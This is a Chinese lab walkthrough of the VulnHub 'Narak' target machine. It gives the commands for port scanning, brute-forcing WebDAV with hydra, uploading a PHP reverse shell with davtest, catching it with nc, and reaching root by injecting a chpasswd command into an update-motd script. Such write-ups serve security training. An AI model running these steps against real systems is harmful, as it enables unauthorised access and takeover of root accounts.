靶机实战系列之narak靶机

admin 2023年10月28日23:48:05评论12 views字数 1725阅读5分45秒阅读模式



声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 


靶机地址:

https://download.vulnhub.com/ha/narak.ova


内容简介:
在这次打靶过程中,将使用到以下攻击手段

主机发现

端口扫描

信息搜集

密码字典定制

爆破密码

webdav漏洞

PUT方法上传

BF语言解码

MOTD注入

 滑至文末,获取“searchall”下载链接!

1.1 主机发现

arp-scan  -l

靶机实战系列之narak靶机


1.2 端口扫描

nmap -p-  192.168.112.130

靶机实战系列之narak靶机

 nmap -p22,80 -sC -sV 192.168.112.130

靶机实战系列之narak靶机


1.3 信息搜集

爆破目录

dirsearch -u  http://192.168.112.130/

靶机实战系列之narak靶机

发现webdav目录

dirsearch -u  http://192.168.112.130/    -f  -e  html,txt,php  -w  /usr/share/wordlists/dirb/common.txt

靶机实战系列之narak靶机

1.4 密码字典定制

准备密码字典

cewl  http://192.168.112.130    -w  dict.txt

靶机实战系列之narak靶机

使用hydra爆破webdav

hydra   -L  dict.txt  -P dict.txt  192.168.112.130  http-get /webdav   -v

靶机实战系列之narak靶机

成功拿到账号yamdoot密码Swarg


1.5 webdav漏洞上传(PUT方法上传)

davtest  --url  http://192.168.112.130/webdav   -auth yamdoot:Swarg

靶机实战系列之narak靶机

成功上传并且解析php

准备php反弹文件

 cp  /usr/share/webshells/php/php-reverse-shell.php .

靶机实战系列之narak靶机

在此处修改反弹ip

davtest  --url  http://192.168.112.130/webdav   -auth yamdoot:Swarg   -uploadfile   php-reverse-shell.php  -uploadloc 1.php

靶机实战系列之narak靶机

上传成功

nc -lvnp 1234

靶机实战系列之narak靶机

访问http://192.168.112.130/webdav/1.php

拿到权限

靶机实战系列之narak靶机


1.6 BF语言编码


python3 -c "import pty;pty.spawn('/bin/bash')"

靶机实战系列之narak靶机

搜索信息

查找有root权限能读能写的文件

查看 hell.sh 文件

find / -type f -user root -perm -ug=x,o=w  -exec ls -l   '{}' ; 2>/dev/nullcat /mnt/hell.sh

靶机实战系列之narak靶机

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

bf解密

参考  https://ctf.bugku.com/tool/brainfuck

靶机实战系列之narak靶机

chitragupt


1.7 MOTD注入

查看 /etc/passwd 文件

靶机实战系列之narak靶机

有三个账号  分别尝试登录  narak  yamdoot inferno

结果用 inferno 登录成功

靶机实战系列之narak靶机

查找有root权限能读能写的文件

find / -type f -user root -perm -ug=x,o=w  -exec ls -l   '{}' ; 2>/dev/null

靶机实战系列之narak靶机

开机自启文件,可以往里写入命令执行,修改root账号的密码,从而获取权限。

往 /etc/update-motd.d/00-header 文件里写入

echo 'root:123' | chpasswd

靶机实战系列之narak靶机

重新登录刷新脚本执行

靶机实战系列之narak靶机

su 到 root 账号   密码  123 

靶机实战系列之narak靶机


注:如有侵权请后台联系进行删除

觉得内容不错,请点一下"赞"和"在看"



靶机实战系列之narak靶机
点击上方公众号
靶机实战系列之narak靶机
关注我们
靶机实战系列之narak靶机








往期精彩

Armitage|MSF图形界面神器


原创|Searchall3.5.8敏感信息搜索工具







1、公众号后台回复:搜索大法,获取searchall工具下载链接。

2、公众号后台回复:靶场,获取靶场工具网盘下载链接。

3、公众号后台回复:webshell,获取webshell下载链接。

3、公众号后台回复:验证码,获取验证码工具下载链接。


原文始发于微信公众号(嗨嗨安全):靶机实战系列之narak靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月28日23:48:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之narak靶机https://cn-sec.com/archives/2155261.html

发表评论

匿名网友 填写信息